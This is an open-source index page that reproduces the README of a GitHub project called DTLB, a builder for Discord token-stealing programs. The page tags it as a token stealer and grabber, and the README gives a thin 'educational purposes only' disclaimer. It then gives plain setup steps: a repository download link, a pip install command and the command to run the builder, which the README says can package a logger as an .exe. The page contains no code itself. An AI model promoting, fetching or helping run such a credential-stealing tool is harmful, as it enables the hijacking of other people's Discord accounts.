Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/euronymou5/dtlb

DTLB (Discord Token Logger Builder) A program made to log the discord login token.
https://github.com/euronymou5/dtlb

discord discord-token-generator discord-token-grabber discord-token-logger discord-token-stealer token token-grabber token-grabber-discord token-logger token-stealer

Last synced: 1 day ago
JSON representation

DTLB (Discord Token Logger Builder) A program made to log the discord login token.

Awesome Lists containing this project

README

        

# Discord-Token-Logger-Builder (DTLB)

*DTLB (Discord Token Logger Builder) A program made to log the discord login token.*

## DISCLAIMER!

*- This program is made for educational purposes only and to demonstrate how you can create a token logger in python and convert to .exe*

*- I am not responsible for the misuse that is made of this tool!*

# Installation

**First you have to have [Python](https://www.python.org/downloads/) installed.**

**Before installing it, we will check the Add Python to path box:**

**Then we will download the .zip of the repository:**

```
https://github.com/Euronymou5/DTLB/archive/refs/heads/main.zip
```

**Then we will install the requirements.txt with the command:**

```
python -m pip install -r requirements.txt
```

**Start:**

*Double click on the file: main.py*

**Or**

```
python main.py
```

# Images